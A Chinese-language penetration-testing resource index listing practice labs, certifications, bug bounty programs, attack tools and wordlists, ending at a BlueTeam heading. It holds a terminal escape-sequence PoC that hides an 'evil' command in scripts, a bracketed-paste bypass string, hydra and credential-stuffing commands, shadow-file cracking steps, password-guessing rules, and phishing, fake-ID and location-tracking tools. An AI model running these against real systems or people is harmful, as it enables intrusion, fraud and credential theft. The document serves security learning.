Power-PenTest

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

大纲

• 安全资源

  • Document

  • 靶机

    • VulnHub

    • HTB

    • Misc

  • 思维简图

  • 漏洞库

  • 报告资源

  • 认证资质

    • CISP-PTE

    • OSCP

    • OSCE

    • Security+

    • PenTest+

  • SRC-众测收集

• 安全工具

  • 工具资源

  • 渗透套件

  • 抓包工具

• CTF

  • 大型赛事Writeup

• Crypto

  • 常见编码

  • 现代密码

  • 古典密码

  • 其他编码

• Misc

  • 钓鱼社工

    • Email钓鱼

    • office钓鱼

  • 爆破

    • 字典

    • Hash爆破

    • Web爆破

    • 端口爆破

    • 文件爆破

• BlueTeam

  • 事件响应

    • 取证

    • 应急

  • 安全建设

• RedTeam

  • 环境部署

  • 信息收集

  • LAN-WAN

    • MITM

      • L2

      • L3

      • L4+

    • DOS

  • OS安全

    • Linux

    • Windows

  • Web安全

    • 前端攻防

    • BS-Exploits

    • Web_Generic

    • IDOR

    • Web_Tricks

      • HTTP_request_smuggling

      • JWT安全

      • OOB

      • 绕过访问

  • 安防设备

  • 后渗透

  • 云安全

  • 软件服务安全

  • 协议安全

  • 语言安全

• ICS

  • 工控协议

  • 工控流量

  • PLC攻击

• IoT

  • 无线电安全

    • Bluetooth

    • RFID

    • wifi

  • 硬件安全

    • HID

  • 固件安全

  • IIOT

    • CAN

• MobileSec

  • Android

  • IOS

  • 小程序安全

---

安全资源

笔记/技巧分享

• pen4uin/awesome-pentest-note - 渗透测试☞经验/思路/总结/想法/笔记

• ffffffff0x/Pentest101 - 每周分享一些关于渗透测试的知识点

• RedBlue 攻防知识库

• damit5个人知识库

Document

• FeeiCN/Security-PPT - 大安全各领域各公司各会议分享的 PPT

• knownsec/KCon - 历届 KCon 文档合集

• lovesec/2017-Security-ppt - 17年安全会议对外公开的PPT

• EvilAnne/Violation_Pnetest - 渗透红线 Checklist

---

靶机

在线

• OverTheWire: Wargames

• TryHackMe | Hacking Training

VulnHub

VulnHub 是一个面向所有人开放的安全靶场，有很多安全环境，只要下载相关镜像，在相关虚拟机上面运行就可以练习相关靶场。

地址 : https://www.vulnhub.com/

• DC Serial - DC 系列靶场,难度简单至中等,推荐初学者挑战

  • DC1-WalkThrough - 知识点 : drupal 漏洞利用、Linux 提权、hashcat 跑密码、drush 使用

  • DC2-WalkThrough - 知识点 : 字典生成工具 cewl、wpscan、rbash 逃逸、git 提权

  • DC3-WalkThrough - 知识点 : Joomla SQL 注入、john 跑 hash、web 命令执行、CVE-2016-4557 提权

  • DC4-WalkThrough - 知识点 : web 登录爆破、web 命令执行、反弹 shell、SSH 爆破、linux 提权

  • DC5-WalkThrough - 知识点 : Get 参数 Fuzz、LFI、日志中毒攻击、screen 4.5.0 提权

  • DC6-WalkThrough - 知识点 : worpress 插件漏洞利用、利用 nmap 提权

  • DC7-WalkThrough - 知识点 : php 弹 shell、通过定时任务提权

  • DC8-WalkThrough - 知识点 : exim4 提权

  • DC9-WalkThrough - 知识点 : knock 服务

• It’s_October

  • It’s_October1-WalkThrough - 知识点 : october 模板注入、写 ssh 密钥

• Kioptrix Serial - Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战

  • Kioptrix2-WalkThrough - 知识点: SQL 注入、命令执行、CVE-2009-2698

  • Kioptrix3-WalkThrough - 知识点: SQL 注入、ht 提权

  • Kioptrix4-WalkThrough - 知识点: SQL 注入、mysql udf 提权

  • Kioptrix5-WalkThrough - 知识点: LFI、自定义 User-agent、phptax 漏洞利用、freebsd 提权

• Mission-Pumpkin - 难度适中,偏向于加解密比较多,漏洞利用内容较少

  • PumpkinGarden-WalkThrough

  • PumpkinRaising-WalkThrough - 知识点: 字符加解密、流量分析、GPG爆破、rbash逃逸、图片隐写

  • PumpkinFestival-WalkThrough - 知识点: 字符加解密、ssh密钥使用、wpscan

• symfonos Serial - 稍有难度的靶场,内容丰富,难度中等,推荐有一定经验者挑战

  • symfonos1-WalkThrough - 知识点: smb 信息探测、wordpress 插件 LFI 漏洞、SMTP 日志投毒

  • symfonos2-WalkThrough - 知识点: smb 信息探测、CVE-2015-3306、CVE-2018-20434、shadow 密码爆破

  • symfonos3-WalkThrough - 知识点: 多级目录爆破、pspy、横向提权、tcpdump 抓包分析

  • symfonos5-WalkThrough - 知识点: ssrf、ldap、dpkg 提权

HTB

• 暂定

Wargames

• Bandit

Misc

• MyKings/docker-vulnerability-environment

• vulhub/vulhub - Vulhub是一个面向大众的开源漏洞靶场，无需docker知识，简单执行一条命令即可编译、运行一个完整的漏洞靶场镜像。

  wget -O f8x https://f8x.io/
  bash f8x -vulhub

• Medicean/VulApps - 快速搭建各种漏洞环境(Various vulnerability environment)

• fofapro/vulfocus - Vulfocus 是一个漏洞集成平台，将漏洞环境 docker 镜像，放入即可使用，开箱即用。

• c0ny1/vulstudy - 使用docker快速搭建各大漏洞靶场，目前可以一键搭建17个靶场。

---

思维简图

• phith0n/Mind-Map: 各种安全相关思维导图整理收集

• SecWiki/sec-chart: 安全思维导图集合

• corkami/pics - 很多二进制相关的图片

---

漏洞库

漏洞查询

• Vulmon

• SecurityFocus

• 国家信息安全漏洞库

• 知道创宇 Seebug 漏洞平台

• 💀 Sploitus

• NVD

• 全球最新漏洞库

• CVE - Common Vulnerabilities and Exposures (CVE)

• CVSS v3.0 Specification Document

• CWE - Common Weakness Enumeration

• ICS-CERT Advisories | ICS-CERT

• cvedetails

• snyk Vulnerability DB

POC/EXP/Payload

• Exploits Database by Offensive Security

  • searchsploit : Exploit-DB 的命令行搜索工具,Kali 自带

• https://github.com/bilbomal/BB-Tips

• https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

• https://github.com/cckuailong/PocCollect

• https://github.com/hanc00l/some_pocsuite

• https://github.com/swisskyrepo/PayloadsAllTheThings

• https://github.com/WangYihang/Exploit-Framework

• https://github.com/Spacial/csirt/blob/master/CVEsPoCs.md

• https://github.com/nanshihui/PocCollect

• https://github.com/BaizeSec/bylibrary

• https://github.com/rootphantomer/exp

• https://www.vulnerability-lab.com/

• https://cxsecurity.com/

• https://github.com/nomi-sec/PoC-in-GitHub

• http://www.expku.com/

• https://cpr-zero.checkpoint.com/

• https://github.com/foospidy/payloads

---

报告资源

• public-pentesting-reports

• PWKv1-REPORT

• PWK-Example-Report-v1

• 0x727/BugRepoter_0x727 - 自动化编写报告平台

---

认证资质

CISP

CISP-PTE

注册信息安全专业人员-渗透测试，英文为 Certified Information Security Professional - Penetration Test Engineer ，简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作，具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。

全程差不多2W人民币,且 WEB 方向居多(2019年是这样的,之后不清楚)

• 相关资源

  • https://blog.zeddyu.info/2019/03/21/CISP-PTE%E8%80%83%E8%AF%95%E5%88%86%E4%BA%AB/#%E5%8D%95%E9%80%89%E9%A2%98

  • https://zgao.top/cisp-pte-%E6%B3%A8%E5%86%8C%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%B7%A5%E7%A8%8B%E5%B8%88%E8%80%83%E8%AF%95-%E6%80%BB%E7%BB%93%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/

CISP

注册信息安全专业人员（Certified Information Security Profeddtional,CISP）是中国信息安全测评中心应国家信息安全保障工作之需，推出的一项提高我国信息安全从业人员素质的专业人才培训认证服务。经过近10年发展，CISP已经成为信息安全专业人员进行资质评定的权威品牌。

培训+考试全程差不多12K

CISP-PTS

注册信息安全专业人员-渗透测试专家，英文为 Certified Information Security Professional - Penetration Testing Specialist ，简称 CISP-PTS。证书持有人员主要从事漏洞研究、代码分析工作，具备对多种攻击方式的技术方法较全面掌握、对最新网络安全动态跟踪研究以及策划解决方案能力。

CISP-IRE

注册信息安全专业人员-应急响应工程师，英文为 Certified Information Security Professional - Incident Response Engineer ，简称 CISP-IRE。证书持有人员主要从事信息安全技术领域应急响应工作，具有了解应急响应概况、应急响应基础、应急响应事件监测、应急响应事件分析和处置的基本知识和能力。

CISP-A

信息安全系统审计师（ChinaCertified Information System Auditor）是由中国信息安全测评中心根据中央编办授权，于 2016 年推出的国家注册信息系统审计师认证制度。

培训+考试全程差不多1W

---

OSCP

CP 更侧重“渗透测试”

案例/经验分享

• OSCP经验分享

• OSCP学习经验分享

资源

• pythonmaster41/Go-For-OSCP - oscp脚本poc、技术清单

• areyou1or0/OSCP - OSCP备考笔记

• Ondrik8/OSCP_note - 一些脚本、技巧收集

• 0x4D31/awesome-oscp - 优秀的OSCP资源精选清单

• total-oscp-guide - oscp知识收集

• xuanhusec/OscpStudyGroup

---

OSCE

CE 更侧重“漏洞挖掘”

案例/经验分享

• 中文首发丨OSCE（Offensive Security Certified Expert）考证全攻略

资源

• ihack4falafel/OSCE

• dhn/OSCE

• 73696e65/windows-exploits

• areyou1or0/OSCE-Exploit-Development

---

Security+

Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会 CompTIA；是和 CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和 CISSP 偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作，Security+ 认证考试包括选择题和实践题 （要求你在模拟环境下进行实践）。通过该认证证明具备网络安全、合规性和操作安全、威胁和漏洞、应用程序、数据和主机安全、访问控制和身份管理以及加密技术等方面的能力。

CompTIA 颁发的认证,各种带 + 的认证都出自这个协会.

题库

• http://comptiaexamtest.com/Security+SY0-401/

---

PenTest+

相关文章

• 中文首发｜CompTIA PenTest+ 考证必看指南

题库

• https://comptiaexamtest.com/PenTest+PT0-001/

---

SRC-众测收集

Open For Signup

• HackerOne

• Bugcrowd

• BountyFactory

• intigriti

• BugBounty.jp

• SafeHats

• HackenProof

• Zero Day Initiative | Home

• Open Bug Bounty | Free Bug Bounty Program & Coordinated Vulnerability Disclosure

• ZERODIUM - The Premium Exploit Acquisition Platform

• HITCON ZeroDay

Invite based Platforms

• Synack

• Cobalt

• Zerocopter

• Yogosha

• Bugbountyzone

• Antihack.me

• Vulnscope

国内通用

• 先知

• 漏洞盒子

• 补天

• CNVD 国家信息安全漏洞共享平台

• DVP去中心化漏洞平台

• 教育行业漏洞报告平台

• ALLSEC首页

国内公司

• 蚂蚁金服安全应急响应中心官网 - AFSRC

• 阿里安全响应中心

• 字节跳动安全中心

• 腾讯安全应急响应中心

• Xiaomi Security Center

• 爱奇艺安全应急响应中心

• 哔哩哔哩安全应急响应中心

• 菜鸟安全应急响应中心

• 点融网安全应急响应中心

• 百度安全应急响应中心

• 饿了吗 ASRC | 阿里本地生活安全响应中心

• 东方财富安全应急响应中心

• 滴滴出行安全应急响应中心

• 富友安全应急响应中心

• 瓜子安全应急响应中心

• 好未来安全应急响应中心

• 焦点安全应急响应中心

• 京东安全应急响应中心

• 竞技世界安全应急响应中心

• 金山安全应急响应中心

• 快手安全应急响应中心

• 美丽联合集团安全应急响应中心

• 美团安全应急响应中心

• 魅族安全中心

• Mobike安全响应中心

• 搜狗安全应急响应中心

• 同程艺龙安全应急响应中心

• 途牛安全应急响应中心

• 苏宁安全应急响应中心

• VIPKID安全应急响应中心

• 挖财安全应急响应中心

• 应急响应 - 网易安全中心

• WDSRC - 微贷安全应急响应中心

• 微博安全应急响应中心

• 完美世界安全应急响应中心

• VSRC首页-唯品会信息安全中心

• 微众安全响应中心

• WIFI万能钥匙安全响应中心

• 携程安全应急响应中心

• 58安全应急响应中心

• 陌陌安全应急响应中心

• 平安集团安全应急响应中心

• 千米电商云安全应急响应中心

• 融360安全应急响应中心

• 去哪儿安全应急响应中心

• 新浪安全应急响应中心

• 宜人贷安全应急响应中心

• 中通安全应急响应中心 (ZSRC)

• 智联招聘应急响应中心

• 宜信安全应急响应中心

• 猪八戒网安全响应中心

• 顺丰安全应急响应中心

文章/tips

• 那些年挖过的 SRC 之我是捡漏王

• 刷 SRC 经验之批量化扫描实践

• Bug Bounty Tips

  Tip #1
  使用 GIT 作为侦察工具. 找到目标的 GIT 存储库,克隆它们,然后检查日志,以获取不一定在源代码中包含的团队信息.假设目标是 Reddit,我想看看哪些开发人员在某些项目上工作.
  例如:https://gist.github.com/EdOverflow/a9aad69a690d97a8da20cd4194ca6596
  
  Tip #2
  在目标或属于目标上查找 GitLab 实例. 当你偶然发现 GitLab 登录面板时,请导航到 /explore. 配置错误的实例不需要身份验证即可查看内部项目. 一旦你进入,使用搜索功能来查找密码,密钥等.这是一个非常大的攻击媒介,我今天终于揭露它,因为我相信它会帮助你们很多人得到一些关键问题.
  
  Tip #3
  Bug 赏金提示:测试需要花钱或需要手动设置的公司的应用程序. 很少有人甚至没有人会测试它而让它变得脆弱.
  
  Tip #4
  如果你发现了一个可以改变其他人数据的 IDOR,那么不要着急去报告它 > 把它修改成 XSS  Payload  & 如果输入未被清理 & 变量没有被转义就被回显,那么IDOR>XSS>ATO.
  
  Tip #5
  寻找与 hackathon-related 相关的资产. 我的意思是,有时公司会运行 hackathon-related 并让与会者特别访问某些 API 端点和临时凭证. 我发现为 Hackathons 设置的 GIT 实例充满了信息,这些信息允许我在目标中发现更多问题.
  
  Tip #6
  保留所有目录爆破结果,以便当像 Drupalgeddon2 这样的 CVE 出来时,你可以查找以前找到的实例 (cat dirsearch/reports// | grep INSTALL.mysql.txt | grep 200 | less)/

• List of bug bounty writeups · Pentester Land - 巨多的案例,真的看不完

• reddelexc/hackerone-reports

• giteshnxtlvl/YourNextBugTip

• 120 Days of High Frequency Hunting

• How to Start Bug Bounties 101 & How to Make a Million in 4 Years

• 打造全自动漏洞赏金扫描工具

• J0o1ey/BountyHunterInChina

• Telegram bug bounties: XSS, privacy issues, official bot exploitation and more…

• SRC挖洞信息搜集和快速定位SRC框架

资产资源

• https://i.hacking8.com/src/

• https://github.com/TSlayman/Bug-Hunting-Domains

---

面试技巧

• FeeiCN/SecurityInterviewGuide - 网络信息安全从业者面试指南（持续补充各公司招聘面试题目和侧重点）

• Leezj9671/Pentest_Interview - 个人准备渗透测试和安全面试的经验之谈，和去部分厂商的面试题

• Kit4y/2020-Interview-experience - 安全和开发方向-2020年春季师傅们的面经

• d1nfinite/sec-interview - 信息安全面试题汇总

---

安全工具

工具资源

• Jack-Liang/kalitools

• k8gege/K8tools

• Mr-xn/hackbar2.1.3

• HCTYMFF/hackbar2.1.3

• Kali Linux Tools Listing | Penetration Testing Tools

• 信息安全工具汇总

• LasCC/Hack-Tools

• wudimahua/Firewall

渗透套件

• kali - 专用于渗透测试的操作系统

  • kali 笔记

• CobaltStrike - 后渗透神器

  • CobaltStrike 笔记

• Empire - 基于 PowerShell 和 Python 的后渗透框架,常用于生成免杀

  • 相关文章

    • [技术分享]一篇文章精通 PowerShell Empire 2.3(上)

    • [技术分享]一篇文章精通 PowerShell Empire 2.3(下)

  • 图形化 UI

    • leeberg/BlueCommand - 使用 PowerShell Universal Dashboard 为 PowerShell Empire 提供仪表板和工具化前端服务

    • BC-SECURITY/Starkiller

• metasploit - 漏洞利用框架

  • metasploit 笔记

• PowerSploit - 一个 PowerShell 渗透模块集合框架

• monkey - 自动渗透工具

• Ladon - 大型内网渗透扫描器&Cobalt Strike,包含信息收集/端口扫描/服务识别/网络资产/密码爆破/漏洞检测/漏洞利用.

• railgun - 漏洞利用+ctftools+信息收集，非常强大的集成工具

• yaklang/yakit - Yakit是基于yak语言开发的网络安全单兵工具，旨在打造一个覆盖渗透测试全流程的网络安全工具库。

• dstotijn/hetty - An HTTP toolkit for security research.

---

抓包工具

BurpSuite

• BurpSuite 笔记

Wireshark

• Wireshark 笔记

Fiddler

Fiddler 是一个用于 HTTP 调试的代理服务器应用程序

charles

Charles Web 调试代理是用 Java 编写的跨平台 HTTP 调试代理服务器应用程序。它使用户能够查看从本地计算机访问的 HTTP，HTTPS，HTTP / 2 以及从本地计算机访问或通过本地计算机访问的已启用的 TCP 端口通信。这包括请求和响应，包括 HTTP 标头和元数据，其功能旨在帮助开发人员分析连接和消息传递。

mitmproxy

proxify

---

CTF

• CTF 笔记

---

Crypto

• Crypto 笔记

---

Misc

钓鱼社工

钓鱼案例

• 指尖博弈——FBI竟建立虚假联邦快递网站

• Cookie Maker:隐藏在Google Docs中的恶意网络

• 利用斯拉夫字母辅助社会工程学攻击思路

• XXXX第X次内部红蓝对抗

• 攻击技术研判｜利用Google Docs的评论功能投递钓鱼链接

• 攻击技术研判 | 近期频发钓鱼新手法：伪造弹出登录窗口进行钓鱼攻击

• 一文洞察攻防演练期间的钓鱼木马手法

• 攻击技术研判｜钓鱼网站反分析手法升级

社工案例

• 一个精壮的代购骗子被我彻底征服

• 看我如何破解xiaoba勒索病毒最新版并社工

• [忍无可忍]揭秘一个专门针对学生家长下手的诈骗团伙

• 一个xss漏洞到内网漫游

• 从社工考试答案到发现惊天作弊团伙

• 卧薪尝胆~揭秘新型刷票骗局,击溃骗子的心肝脾肺肾!

• 对某黑产大佬的一次扒皮

• 记一次对色情网站拥有人身份的挖掘

• 这回不定位女友了:火车票上的星号暗藏玄机？!

• 常见社工方法以及如何防社工

• 从群体电脑蓝屏到反黑幕后黑手

• 杨猛 | 世界上最好的在线游戏:追踪杀手,也调查冲突和毒枭

• 我被人吞了一部手机,调查后发现对方是淘宝打假人

• "答应我,别做违法事"——我是如何劝色情网站操控者从良的

• QQ申诉那点事

• 朋友圈别瞎发照片,指不定跟踪狂就是这样找到你家的

• 社会工程学（Social Engineering）真实案例

• 如何使用账户恢复功能追踪目标人？- 开源情报搜集方法

定位

• Seeker - 一款可获取高精度地理和设备信息的工具

身份信息

• Generate a Random Name - 随机身份生成

• Fake Address, Random Address Generator - 随机身份生成

• Behind the Name - Random Name Generator

• Easy Random Name Picker - Random Name Generator

• ElfQrin - Fake Identity ID Random Name Generator

• Random User Generator

• 在线身份证号码生成器

• 中国大陆内地姓名、身份证号、银行卡号生成器

• 在线身份证号码生成器

• airob0t/idcardgenerator 身份证图片生成工具

• gh0stkey/RGPerson - 随机身份生成脚本

• naozibuhao/idcard - 身份证生成器

• 伪造人像

• Just Delete Me - 假身份生成器(这个网站的图标,好像在哪里看过🤔)

rlo

• 相关文章

  • RLO文件名欺骗

  • 木马逆名欺骗:利用unicode控制符RLO

URL 欺骗

• 相关文章

  • Phishing with Unicode Domains

复制篡改

相关文章

• Copy-Paste from Website to Terminal

• Pastejacking

Escape Sequences

相关文章

• Terminal Escape Injection

• Terminal escape sequences - the new XSS for Linux sysadmins

• s/party/hack like it's 1999

• Hiding from cats

• Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters

poc

# linux
echo -e '#!/bin/sh\n\necho "evil!"\nexit 0\n\033[2Aecho "Hello World!"\n' > script.sh
chmod a+x script.sh

# python
echo -e '#!/usr/bin/python\n\nprint "evil!";\nexit(0);\n#\033[2A\033[1Dprint "Hello World!";\n' > script.py
chmod a+x script.py

# Batch
echo -e '@echo off\n\r\n\recho evil!\r\n::\033[2D  \033[A\033[2Decho Hello World!' > script.bat

# PowerShell
echo -e 'write-host "evil!"\r\n#\033[A\033[2Dwrite-host "Hello World!"' > script.ps1

Bypassing the Bracket Paste Mode

ESC[201~clear; echo "Bypass Bracketed Paste Mode"

Email钓鱼

相关文章

• 关于电子邮件诈骗的一些分析

• 一个邮箱账号的展开式

• 记一次钓鱼测试

相关工具

• 邮件轰炸机-垃圾邮件发送器

• SkewwG/henggeFish - 自动化批量发送钓鱼邮件

SMTP

• 见 Protocol-Exploits SMTP 部分

office钓鱼

相关文章

• 攻防演练对抗赛之初识文件钓鱼

• 攻击技术研判 | 利用Excel默认密码实现静态免杀静态并减少钓鱼步骤

• 攻击技术研判 | 后宏时代：PPT鼠标悬停事件的新利用

• AWS S3 Bucket子域接管实现可信钓鱼服务攻击

• 文本类型的免杀

漏洞利用

• Office漏洞利用

水坑钓鱼

相关文章

• 水坑钓鱼研究

• 实战钓鱼中的html附件利用

相关工具

• HTTrack - 克隆任意网站

• thelinuxchoice/blackeye - 网络钓鱼工具,有32个模板+1定制

• SET

  • SET 笔记

• gophish/gophish - Open-Source Phishing Toolkit

• xiecat/goblin - 一款适用于红蓝对抗中的仿真钓鱼系统

• Threezh1/SiteCopy

---

爆破

网络中有需要登陆的地方即需要口令或密码，特别是网站管理后台和邮箱，如果使用弱口令，一旦被人猜到或破解，就如同拿到了钥匙，随意进出，网络资产将面临巨大的风险。当然,不只是后台,一些 api 端点存在的认证，jwt密钥，等等，都存在爆破的可能

字典

Tips

1. 按场景来看,敏感的场景,目标或业务量大的场景,字典不是越多越好,力求精简,求快,不要把功夫全放在 fuzz 上,条件允许的话就针对目标专门定制一个字典,这可能涉及到一些社工的技巧.

2. 如果没有安全设备,那就随便搞吧,先来个 [TOP10]*[TOP10000] 再说.

3. 字典还是自己收集整理的最好,有空的话,建议把 github 上的自己分分类,把什么 Hentai、pussy、dick 这种奇奇怪怪的密码早点删了🤣.

4. 数据库是管理字典的好帮手,善用统计、去重功能有奇效.

5. 很多厂商设备默认口令可以在这个网站找到 https://default-password.info/

6. 要想在实战中用好爆破的各种攻击技术一定要学好加密知识,不要 "练拳不练功，到老一场空"

字典规则

常见组合 (Common)

• payload + 123

• payload + 1234

• payload + 123456

• payload + 12345

• payload + @123

• payload + @123456

• payload + @12345

• payload + #123

• payload + #123456

• payload + #12345

• payload + _123

• payload + _123456

• payload + _12345

• payload + 123!@#

• payload + !@#$

• payload + !@#

• payload + ~!@

• payload + !@#123

• payload + 2017

• payload + 2016

• payload + 2015

• payload + @2017

• payload + @2016

• payload + @2015

生日组合 (Birthday)

• 19880808

• tony19980808

• tony@19980808

年份列表 (years)

• 1987

• 1988

• 1989

1337模式替换 (leet)

• 1earn

键盘布局 (Keyboard layout)

• qwerty

大小写变换 (case reversal)

• admin

• Admin

• admIn

单位名+@+年份/123/或常见弱口令 (company + sth.)

• Huawei@123

单位名+小写业务名+@+年份/123/或常见弱口令 (company + business + sth.)

• BEIJINGXXyy@2019

大写地名+小写业务名+@+年份/123/或常见弱口令 (Place + business + sth.)

• BEIJINGinfo@2019

大写城市+小写区县+单位名 (Uppercase city + lowercase district/county + unit name + sth.)

• BJ_cy_yey(北京_朝阳_幼儿园)

管理员名+@+年份/123/或常见弱口令 (Administrator + sth.)

• tony@2019

医院工号 (Hospital staff ID)

• 0000-9999

公司相关信息 域名+简称 (Company Information Domain+Abbreviation)

• wy@360buy

• xxx.com@123

拼音

• zhangsan

• zhang.san

• zhangs

中文

• 张三

• 李四

• 张san

相关文章

• 关于字典整理的心得分享

• 强弱密码爆破的姿势

字典编辑工具

• PilotEdit - 大文件编辑器 (Large file editor)

• glogg - 大文件查看工具(只读) (Large file viewing tool (read only))

字典生成工具

• LandGrey/pydictor - 一个强大实用的黑客暴力破解字典建立工具

• crunch - 字典生成工具

• RicterZ/genpAss - 中国特色的弱口令生成器

• 自制弱口令字典 top100

• HongLuDianXue/BaiLu-SED-Tool - 白鹿社工字典生成器，灵活与易用兼顾。

• cewl - 可抓取网站信息用于生成密码的工具,kali 自带

  cewl http://xxx.com -w out.txt

• Mebus/cupp

• r3nt0n/bopscrk

• ffffffff0x/name-fuzz - 针对目标已知信息的字典生成工具

• ffffffff0x/gendict - 针对目标已知信息的字典生成工具

杂项字典

• AboutSecurity/Dic

• Stardustsky/SaiDict - 字典分类的不错

• rootphantomer/Blasting_dictionary - 爆破字典

• Weakpass

• danielmiessler/SecLists

• r35tart/RW_Password - 此项目用来提取收集以往泄露的密码中符合条件的强弱密码

• wainshine/Chinese-Names-Corpus - 中文人名语料库.中文姓名,姓氏,名字,称呼,日本人名,翻译人名,英文人名.成语词典.

• modood/Administrative-divisions-of-China - 中华人民共和国行政区划:省级(省份直辖市自治区)、 地级(城市)、 县级(区县)、 乡级(乡镇街道)、 村级(村委会居委会) ,中国省市区镇村二级三级四级五级联动地址数据 Node.js 爬虫.

• berzerk0/Probable-Wordlists

• minimaxir/big-list-of-naughty-strings

• k8gege/PasswordDic - 2011-2019年Top100弱口令密码字典 Top1000密码字典 服务器 SSH/VPS 密码字典 后台管理密码字典 数据库密码字典

• xnohat/vipasswordict: Vietnamese Password Dicts - 越南语字典

• huyuanzhi2/password_brute_dictionary - 口令爆破字典，有键盘组合字典、拼音字典、字母与数字混合这三种类型

• SmithEcon/Fuzz_dic - 参数 | 字典 collections

• Debdut/names.io - 英文人名大全

• lutfumertceylan/top25-parameter

• Assetnote Wordlists

Web 字典

• AboutSecurity/Dic/Web

• H4lo/dictionary

• TheKingOfDuck/fuzzDicts - Web Pentesting Fuzz 字典

• Bo0oM/fuzz.txt - Potentially dangerous files

• EdOverflow/bugbounty-cheatsheet - A list of interesting payloads, tips and tricks for bug bounty hunters.

• tennc/fuzzdb - 一个 fuzzdb 扩展库

• 7dog7/bottleneckOsmosis - fuzz param,注释,js 字典,ctf

• boy-hack/wooyun-payload - 从乌云漏洞库中提取的扫描规则

• DictionaryHouse/Dirpath_List

• insightglacier/Dictionary-Of-Pentesting

• p0dalirius/webapp-wordlists

• f0ng/JavaFileDict - Java应用的一些配置文件字典，来源于公开的字典与平时收集

设备默认口令

• Default passwords list - Select manufacturer

• Default Router Login, Passwords and IP Addresses

• Default Passwords | CIRT.net

• List of Default Passwords

• Router Passwords

• Router Passwords Community Database - The Wireless Router Experts

• defaultpassword.us

• passwordsdatabase

• Open Sez Me!

---

Hash爆破

• https://hashes.org/index.php

相关工具

• moyuwa/toppwdhash - 常见密码哈希离线查询工具 , 包含算法类型 'md5', 'md5x2', 'md5x3', 'sha1', 'ntlm', 'mysql', 'mysql5', 'md5_sha1', 'sha1_sha1', 'sha1_md5', 'md5_base64', 'md5_middle'

Hashcat

• Hashcat 笔记

John the Ripper

• 官网 : https://www.openwall.com/john/

• 相关工具

  • Johnny - GUI 版本的 John the Ripper

• 相关文章

  • Kali Linux：使用John the Ripper破解密码

  • /etc/shadow文件破解，密码破解，md5，SHA256，SHA512破解

• 跑未加密文件名的 7z 压缩包

  wget https://raw.githubusercontent.com/philsmd/7z2hashcat/master/7z2hashcat.pl
  perl 7z2hashcat.pl file.7z > hash.txt   # https://github.com/philsmd/7z2hashcat
  john --wordlist=pass1.txt hash.txt

• 跑 linux shadow 文件

  mkdir /root/.john
  cp passwd /root/.john
  cp shadow /root/.john
  cd /root/.john
  unshadow passwd shadow > hash.txt
  gunzip /usr/share/wordlists/rockyou.txt.gz
  john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

• 补充

  跑 GPG,用 gpg2john 把它转换成 john 能理解的 hash 值再跑

  gpg2john test.gpg > hash
  john --wordlist=wordlist.txt hash

---

Web爆破

Tips

• 目录、文件是一个关键点,别忘了尝试对 GET、POST 参数进行 Fuzz、甚至 user-agent、cookie 都可以 fuzz

• wfuzz 是个神器、一定要会用

相关工具

• wfuzz

• Burpsuite

• lijiejie/htpwdScan - 一个简单的 HTTP 暴力破解、撞库攻击脚本

  htpwdScan.py -u https://jigsaw.w3.org/HTTP/Basic/ --auth user.txt passwd.txt
  htpwdScan.py -u https://jigsaw.w3.org/HTTP/Basic/ --auth tests/leaked_db.txt
  htpwdScan.py -u https://jigsaw.w3.org/HTTP/Digest/ --auth user.txt passwd.txt --pass-first
  htpwdScan.py -u https://mail.owa-domain.com/ews --auth user.txt pass.txt --pass-first

• yzddmr6/WebCrack - web 后台弱口令/万能密码批量爆破、检测工具.支持主流及部分小众 CMS.

  python3 webcrack.py

---

端口爆破

通用工具

• shack2/SNETCracker - Windows 平台的弱口令工具,多线程检查.速度快,准确度高,推荐,可爆破 SSH、RDP、SMB、MySQL、MSSQL、ORACLE、FTP、MongoDB、Memcache、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、VNC、Redis

  • 3389-RDP操作异常-无法获取"RdpClient"控件的窗口句柄.不支持无窗口的 ActiveX 控件 报错就把线程调低,建议rdp小于10个线程.

  • SSH登录发生异常!Could not load file or assembly 'ChilkatDotNet4.dll' or one of its dependencies. 找不到指定的模块. at SNETCracker.Model.CrackSSH.creack(String ip, Int32 port, String username, String password, Int32 timeOut) ssh 模块需要 vc++2010 32 位支持,下载安装就行了.

  • oracle 由于实例名不一定是 orcl,所以成功率较低.设置中可以改

• vanhauser-thc/thc-hydra - hydra 不多说了，支持多种网络服务的认证破解工具

  hydra -l admin -p password ftp://localhost/
  hydra -L default_logins.txt -p test ftp://localhost/
  hydra -l admin -P common_passwords.txt ftp://localhost/
  hydra -L logins.txt -P passwords.txt ftp://localhost/
  hydra -l "" -P ./pass -e n -t 1 10.0.0.100 vnc -V
  hydra -L ./users -P ./pass -e ns -t 1 10.0.0.50 telnet -v
  hydra -l root -P ./pass.dic 1.1.1.1 ssh

• lanjelot/patator - 一款多功能暴力破解工具，具有模块化设计和灵活的用法。使用语法简直折磨人.

• netxfly/x-crack - GO 语言写的弱口令扫描器,开发教程很详细,推荐,其支持: FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB

• galkan/crowbar - Crowbar 是一个可以在渗透测试中使用的暴力破解工具。它的开发是为了支持 thc-hydra 和其他流行的暴力破解工具目前不支持的协议。

• awake1t/PortBrute - 一款跨平台小巧的端口爆破工具，支持爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD / A cross-platform compact port blasting tool that supports blasting FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD

---

文件爆破

爆破 office 加密

• 取证 爆破 Office 加密

爆破 PDF 加密

• 取证 爆破 PDF 部分

爆破压缩包加密

• 取证 爆破压缩包部分

爆破 VMX 密码

• 内存取证 - 爆破密码部分

---

BlueTeam

